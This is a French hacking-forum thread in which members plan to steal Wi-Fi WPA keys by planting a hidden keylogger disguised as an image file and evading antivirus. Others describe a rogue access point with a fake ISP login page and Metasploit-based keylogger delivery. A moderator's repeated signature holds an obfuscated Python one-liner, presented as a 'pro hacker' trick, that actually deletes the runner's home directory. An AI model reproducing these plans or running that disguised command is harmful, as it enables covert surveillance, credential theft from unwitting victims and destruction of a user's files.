Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-05-2012 18:44:41

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

idée social engineering, obtention clefs WPA (keylogger)

(Re-)Bonjour,

Déjà, excusez moi si je n'suis pas dans la bonne cession, je n'ai trouvé nul part d'autres mettre ce topic.

Depuis quelques jours maintenant, j'essaie d'exploiter une idée que j'ai eu.. elle est toute simple:

J'ai vu/lu que l'obtention d'une clefs est  super longue, quel que soit la méthode.
j'ai donc l'intention de créer quelque chose de rapide et de surtout super simple a mettre en place. Par contre cela requiert un utilisateurs sur la box choisie. Voici l'algo sur lequel je bosse:

On scan le reseau => On repère une cible potentielle (@MacStation) => On introduit un Keylogger sur ce dernier => On le deconnecte de la box en l'obligeant à taper à nouveau la clefs WPA/WEP (la..j'ai eu un petit soucis de choix, soit on lui fait croire qu'il est déco et on fait apparaitre une vrai-fausse boite de dialogue lui demandant le code, soit on le déco (j'ai pas les connaissances suffisantes en bash pour effectuer la deuxiéme option.. c'est pourquoi je suis ici en fait smile ) ) => on retourne chercher les données du keylogger => on supprime le keylogger

Aprés lecture du fichier .txt généré par le keylog on retrouve les données tappées et donc la fameuse clefs.

J'ai dors et déjà travaillé sur un keylogger (en python) enregistrant les données la ou il faut et sans aucune détéction. Je me tourne vers vous afin de m'orienter: est-ce une bonne idée que de continuer sur cette voie? et surtout, c'est faisable? smile

Merci


développeur Labview et python.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-05-2012 20:50:59

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : idée social engineering, obtention clefs WPA (keylogger)

ça existe déjà ce genre de méthode il me semble.


1310812721.gif

Hors Ligne

#3 07-05-2012 20:56:38

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : idée social engineering, obtention clefs WPA (keylogger)

Equador a écrit :

On repère une cible potentielle (@MacStation) => On introduit un Keylogger sur ce dernier

\o/

J'aime tes flèches.
À ton niveau, et à celui de beaucoup de personnes dans le monde, "introduire un keylogger" sur un pc à partir de son adresse MAC n'est pas une opération réalisable. Encore moins répétable.

Le concept de la récupération du mot de passe en le demandant à l'utilisateur n'est pas nouveau, désolé.
On avait déja bossé sur un projet de rogue AP ici, voici le principe :

1. On déconnecte l'utilisateur, on lui destroye son réseau, on ARP dans tous les sens, bref, Tout pète. Accessoirement on fait planter l'AP.

2. On lance notre faux AP, même nom, sans chiffrage, avec une redirection vers une page bidon travaillée pour ressembler à une page officielle de Orange/SFR/Free/Bouygues invitant l'utilisateur à rentrer son mot de passe.

3. L'utilisateur rentre son mot de passe.

4. pwned. (sauf que si on coupe de suite le faux réseau sans lui filer accès au net, il risque de se poser des questions)


Voila !

(je suis intéressé par le code de ton keylogger en python. notamment au niveau du lancement sur la machine victime)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 08-05-2012 01:07:57

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

Re : idée social engineering, obtention clefs WPA (keylogger)

Oui, je n'avais pas.. disons, la prétention, d'introduire un fait nouveau ici. J'me doute bien ne pas être le premier à en parler smile

mais j'voulais ici adopter un cas "caché" c'est à dire que le keylogger tourne en background (console Windows) et enregistre les données dans un répertoire.
S'qui aurai été disons.. sympa, c'est de crash le réseau du type et que la box lui redemande d'elle même de rentrer de nouveau la clefs sécurité, il n'aurai aucun accès au réseau durant cette période, donc impossible de l'écouter, en attendant on ping à fond son mac pour savoir quand il revient et dés qu'il retrouve son accès au réseau, on récupère les informations de notre keylog! Je dirai aussi simple que ça...(je reformulerai presque ma phrase en disant que JE vois ça aussi simple que ça!)

au niveau du lancement? aucun algorithme particulier, un .exe associé à un fichier image suffira (il ouvre l'image et pouf, le keylog se met en place et enregistre les données dans un fichier caché (malheureusement.. ça sera compatible que pour windows (pour l'instant) ) pour un lancement de la console en "caché" il faut enregistrer le fichier en .pyw et au moment de créer le setup (j'utilise py2exe) on fait bien attention à avoir toujours un setup.pyw) ce qui nous fait un joli p'tit setup en caché smile, j'peux partager le keylog que j'ai créé si tu veux, mais y en a surement des plus aboutis sur internet!)
Bien-sur tout ça c'est (malheureusement?) pour Windows

Bref c'est une autre tactique que je propose, mais je n'sais pas si elle est possible, après en vu de tes dires, introduire un keylogger sur une machine est certainement très compliqué surtout sans éveille les soupçons de la machine cible.(bon, après pour savoir ou non si le keylog sera détecté par un antivirus, y a des moyens, disons.. de contournement de sécurité que j'ai à ma disposition permettant de cibler la signature d'octet du programme et de la viré pour qu'elle soit invisible pour lui (sauf certains antivirus que je n'ai pas a ma disposition :\ ) )

mais votre projet m’intéresse, y a moyen d'y jeter un p'tit coup d'oeil ? smile (surtout la première étape)


développeur Labview et python.

Hors Ligne

#5 08-05-2012 04:54:41

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : idée social engineering, obtention clefs WPA (keylogger)

@Equador: Je ne vois pas ou est l’intérêt dans ton idée, sauf à s’entraîner pour apprendre d'avantage Python et combler quelques lacunes un peu partout en réseau, Windows, etc.
Si tu as un accès physique à la machine que tu veux compromettre, je crois que cela n'est pas vraiment du hacking au sens propre et informatique du terme, mais plutôt de l’espionnage. Car en étant sur place, quelques tools vont te permettre de révéler la clé WPA enregistrée sur le disque dur, en plus tu vas jouer à nouveau à mission impossible pour retourner chercher ton fichier (txt) généré par le keylogger !  pourquoi ne pas y aller tout simplement jeter un coup d'oeil à la vignette au dos du routeur ? roll

Dernière modification par Fuji (09-05-2012 00:26:27)

Hors Ligne

#6 08-05-2012 06:12:05

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : idée social engineering, obtention clefs WPA (keylogger)

Moi j'avais compris qu'il voulais faire une sorte de rogue AP à la ghost phisher et déconnecter la cible.


1310812721.gif

Hors Ligne

#7 08-05-2012 15:53:22

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

Re : idée social engineering, obtention clefs WPA (keylogger)

Je n'souhaite pas poser le keylog à des fins d'éspionnages.. mais je pensais que c'était un moyen..facile, de récupérer les informations sans que la personne ne s'en rende compte! (les fichiers .txt sont enregistrés dans un répertoire bien précis)
'fin, si c'est impossible, c'est pas important, je voulais juste émettre une idée! smile et y a bien d'autres techniques!Pour ce qui est d'aller le voir le code, oui, on peut toujours hein! mais cela peut être intéressant de voir les autres façon de l'obtenir, surtout si cela peut jouer sur la sécurité.

Et coyotus, non je n'voulais pas que la victime découvre la supercherie et qu'elle se dise seulement que cela est du à un bug réseau.


développeur Labview et python.

Hors Ligne

#8 09-05-2012 00:48:30

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : idée social engineering, obtention clefs WPA (keylogger)

J'étais quasiment sûr que tu allais comprendre autrement, J'ai dis tout simplement que aller poser un keylogger dans l'ordinateur de la victime puis revenir pour envoyer une rafale de (déauth) et rebrousser à nouveau le chemin pour récupérer le résultat du keyloggor, est stratégiquement nul d'un point de vue hacking. J'ai pas dis que tu étais un agent 007 smile

Dernière modification par Fuji (09-05-2012 00:49:35)

Hors Ligne

#9 10-05-2012 07:50:36

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : idée social engineering, obtention clefs WPA (keylogger)

Hi.

Oui, je te conseille d'aller faire un petit tour du coté de l'outil GTWPA qui avait été développé dans ce forum (j'y avais participé à l'époque) --> http://www.crack-wifi.com/forum/topic-4 … ppers.html

Je suis intéressé par ton KeyLogger en python. Je suppose que tu utilise Pyhook & Cie et ensuite py2exe pour permettre le portage sur Win. Si tu peux m'envoyer la source je t'en serais très reconnaissant.

Ce que tu peux imaginer c'est justement (via Metasploit notamment):
- Pwn son routeur
- Fake AP
- Fake page
- Upload keylogger via la Fake Page
- Autorun du keylog

Reste cependant difficile à envisager (AV qui va crier, browsers up-to-date qui ne permettent plus l'exploitation de ce genre de failles).

[HORS  SUJET] Il faudrait repartir sur GTWPA afin de le tweaker et de l'avancer encore plus[/HORS SUJET]


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#10 10-05-2012 20:21:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : idée social engineering, obtention clefs WPA (keylogger)

[HORS SUJET] Mai-Juin = Partiels [/HORS SUJET]


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 11-05-2012 10:41:43

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : idée social engineering, obtention clefs WPA (keylogger)

spawn, pas de soucis on n'a pas le feu aux fesses.
Bon courage pour tes partiels.

PS: C'est vrai que dans l'absolu j'ai plus de temps dans les mois à venir donc motivé pour lancer un petit projet collaboratif :-)
Partiels de quoi ?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]